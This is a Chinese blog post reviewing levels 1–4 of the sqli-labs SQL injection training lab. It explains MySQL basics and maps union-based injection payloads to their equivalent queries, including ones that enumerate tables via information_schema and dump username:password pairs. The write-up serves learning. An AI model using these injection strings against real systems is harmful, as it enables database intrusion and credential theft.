SQL注入_sqli-labs

最新推荐文章于 2023-04-25 20:40:08 发布
最新推荐文章于 2023-04-25 20:40:08 发布
阅读量198 收藏 1
点赞数
分类专栏: web 文章标签: sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41668936/article/details/104012461
版权
本文是对sqli-labs的学习复盘,主要介绍了在Ubuntu和MySQL环境下安装与基本操作,包括数据类型的增删改查,以及ORDER BY、UNION和GROUP_CONCAT()等SQL操作的运用,通过实例解析了SQL注入技巧。
摘要由CSDN通过智能技术生成

sqli-labs复盘

_看了很多好的sqli-labs步骤,虽然讲解都不错,但是由于SQL数据库学习时囫囵吞枣,因此用MYSQL练习数据库的方式复盘sqli-labs的一些操作。_由于是为了复盘,不会涉及全部的SQL语句。

环境:ubantu,mysql。

安装

更新源

apt-get update

安装MySQL

sudo apt-get install mysql-server mysql-client

测试版本是否安装成功

mysql --version

运行mysql

mysql -uroot -p

启动mysql服务(以后做需要web服务时这个有用)

sudo start mysql
sudo stop mysql

基本操作

数据类型

增删改查

  • create database test2;创建test2数据库
  • create table table_name(column_name column_type);创建数据表格式
create table test_tabl(id int auto_increment, title varchar(10) not null, author varchar(10) not null, test_date date, PRIMARY KEY (id));

后面的KEY要加上,很有用。

  • 插入数据,类似于insert into test_tabl(title,author,test_date) values ("abc","ABC","2020-01-16");,继续,多插入几行,便于后面使用。

在这里插入图片描述

到目前为止test_tabl数据表如上,这个数据表位于数据库test2。

  • drop database database_name删除某个数据库,
  • drop table table_name删除数据表。
  • DELECT from table_name where xxx删除where限制下的数据,即使全部删除也仅删数据,表键值还在。
  • select column_name from table_nameselect * from table_name查询数据。

复盘开始

ORDER BY

order by函数是排序的用法,默认升序,DESC为降序,select * from table_name order by column_name ASC/DESC

?id=1' order by 3--+

在MYSQL实际上相当于

select * from 表名 where id="1" order by 3;

在这里插入图片描述

这里放在与id="1"形成and的形式,如果均为1,结果是根据返回id="1"的数据并根据第几列进行排序,超出列数不能返回输出。

union

将两个或多个SELECT语句合并,用法为

select column_name from table_name1
union
select column_name from table_name2

其中union all返回重复的值,

?id=' union select 1,database(),3--+

相当于

select * from 表名 where id="0" union select 1,database(),3;

在这里插入图片描述

前面的id若是正确,返回一行,而其只支持返回一行就会把需要的信息丢掉。而union则是起到了让后面的语句顶替前面数据位置的效果。

group_concat()

  • select concat(str1,str2,…)起连接字符作用,如果存在一个参数为NULL返回值则为NULL。
  • select concat_ws(separator,str1,str2,…)使用分隔符连接字符,如果字符存在NULL,依旧可以有返回值,当然分隔符不能为NULL。
  • group_concat(column_name)为将某列数据打在一行。
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

相当于

select * from 表名 where id="0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema="security"

group_concat将security的数据表以行的形式展示。

在这里插入图片描述

爆列名也类似。

?id=0' union select 1,2,group_concat(username,':',password) from security.users--+

相当于

select * from 表名 where id="0" union select 1,2,group_concat(username,':',password) from security.users

在这里插入图片描述

这是个分割线,上面为sqli-labs1-4关复盘内容

notwiner
关注
专栏目录
sqli-labs个人注入心得
hecker_chicken的博客
02-02 468
#sqli-labs个人注入心得 闭合方式类型都有一般是’,",或 无闭合符号 或 '),") Less-1 尝试?id=1 注释符号为–+、-- 、#。 当尝试?id=1’)时 很明显是属于单引号闭合方式 用–+注释掉后面的 接下来就要判断一下列数?id=1’ order by 10–+,发现 多试验几次后 得到共有三列数据接着进行联合查询?id=X’(x不等于1,2,3) union sele...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs
sql注入sqli-labs靶场
qq_61019688的博客
04-25 207
id=1'and 1=1--+和?id=1'and 1=2--+,页面有明显变化,1=1为真,正常返回,1=2为假,页面报错,由此可以判断是字符型注入;id=-1' union select 1,database(),version()--+,获取数据库名和版本信息(注意此处id必须设为-1,即一个不存在的id,才能正常回显数据)id=1' order by 3--+正常回显,可知表的列数为3;id=1 and 1=2,页面无变化,说明and 1=1和and 1=2语句未被执行,由此判断不是数字型注入;
mysql查询%3cnull%3e_sqli-labs-master前十关过关总结
weixin_36400198的博客
01-28 1078
登入Windows命令行MySQL,方便查验注入命令第一关:在$_GET id处注入源码如下 只需构造闭合即可爆出数据单引号’报错查列数: 知道为3列之后使用sql联合查询语句:union这里需要注意,使用联合查询爆出数据库名称的时候前面id值需要放空: 因为网页上能显示的只有第一行的内容 所以前面id值需要放空为“null”查看所有数据库名称:?id=' union selec...
【Day2】 MySQL语句以及sqli-labs的环境配置
lyy0xfff的博客
04-06 311
Day2MySQL语句的拓展二级目录三级目录 MySQL语句的拓展 UPDATE语句可以替换某个字段中的某个字符 UPDATE table_name SET field=REPLACE(field, 'old-string', 'new-string') [WHERE Clause] eg: 以下实例将更新 runoob_id 为 3 的runoob_title 字段值的 “C++” 替换为...
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip sql注入的学习靶机
最新发布
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs靶场环境配置教程及出现的问题
weixin_52127082的博客
03-18 1583
一、phpstudy与sqli-labs的下载 phpstudy一定要下载2018版本的, 地址:http://public.xp.cn/upgrades/PhpStudy2018.zip sqli-labs下载地址:https://github.com/audi-1/sqli-labs 下载好zip包后解压到phpStudy\PHPTutorial\WWW路径中 二、配置sqli-labs的数据库 phpstudy的数据库默认用户名跟密码都是root,更改sqli-labs-master\sql-conn
centos-7中搭建sqli-labs(mysql+apache+php)
weixin_45937436的博客
05-05 1878
在CentOS中默认安装有MariaDB,这个是MySQL的分支,但为了需要,还是要在系统中安装MySQL,而且安装完成之后可以直接覆盖掉MariaDB。 1 下载并安装MySQL官方的 Yum Repository [root@localhost ~]# wget -i -c http://dev.mysql.com/get/mysql57-community-release-el7-10.n...
SQL注入Sqli-labs注入环境搭建》
weixin_47118413的博客
04-06 8380
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程。
关于sqli-labs出现fatal错误的解决方法
qq_42168622的博客
01-05 2886
1.一般是phpstudy版本的问题 修改一下数据库版本到5就可以 建议用php5.4以上的,因为php5.4的以上可以用PHPmyadmin管理数据库. 2.PHP5的函数库与php7的函数库不同,5是用mysql函数,7中则是用mysqli函数。 具体怎么改可以看这个链接,比较详细 https://blog.51cto.com/11834557/2309881 总结就是...
SQL注入】windows下sqli-labs的搭建
spectre
05-30 1万+
sqli-libs是一个联系SQL注入的平台,包括联合查询注入、盲注、头部注入、过安全狗等 源码下载 下载地址:https://github.com/Audi-1/sqli-labs 运行环境要求 Apache+mysql+PHPTomcat+mysql+java环境(部分关卡需要) Windows下的安装 Apache的环境在Windows下可以直接选择wamp、xampp、PH
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
sql注入学习(包括sqlilabs安装搭建注入环境步骤以及sqlmap安装操作说明链接地址)
莉莉安的博客
02-04 1万+
SQL注入: 就是把SQL命令插入到Web表单然后提交到所在页面请求(查询字符串),从而达到欺骗服务器执行恶意的SQL命令。 它是利用现在已有的应用程序,将SQL语句插入到数据库中执行,执行一些并非按照设计者意图的SQL语句。 SQL注入可以分为平台层注入和代码注入。前者是由不安全的数据库配置或平台漏洞所致。后者是程序员对输入未进行细致过滤产生 sqlilabs搭建注入环境: Sqli-labs是...
SQL注入之手工注入sqli-labs-master
龙乐的专栏
08-22 3936
sql注入就是用户在Web页面中输入的指令内容可以在数据库中执行。这里我通过sqli-labs-master来演示下手工sql注入。 首先是搭建环境,我用的是WampServer
SQL注入天书(SQLi-LABS)搭建
网络猿的博客
01-11 2157
SQL注入天书(SQLi-LABS)搭建: 安装SQLi-LABS需要准备相应的环境,推荐使用phpstudy软件,搭建也很快。 SQLi-LABS下载地址:https://download.csdn.net/download/qq_36451824/14120011 phpstudy下载地址:https://www.xp.cn/wenda/407.html 下载phpstudy2016版本,因为SQLi-LABS太老了,phpstudy新版本不支持的。 1、将下载后的SQLi-LABS解压收放到phpst
PHP与Apache环境下部署SQL注入靶场sqli-labs指南
部署sqli-labs是一个实战训练过程,它不仅提供了丰富的SQL注入实例,还能帮助开发者熟悉如何防范此类攻击,是提升网络安全技能的实用工具。通过这个靶场,你将更深入理解Web应用程序安全的重要性,并掌握如何在实际...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值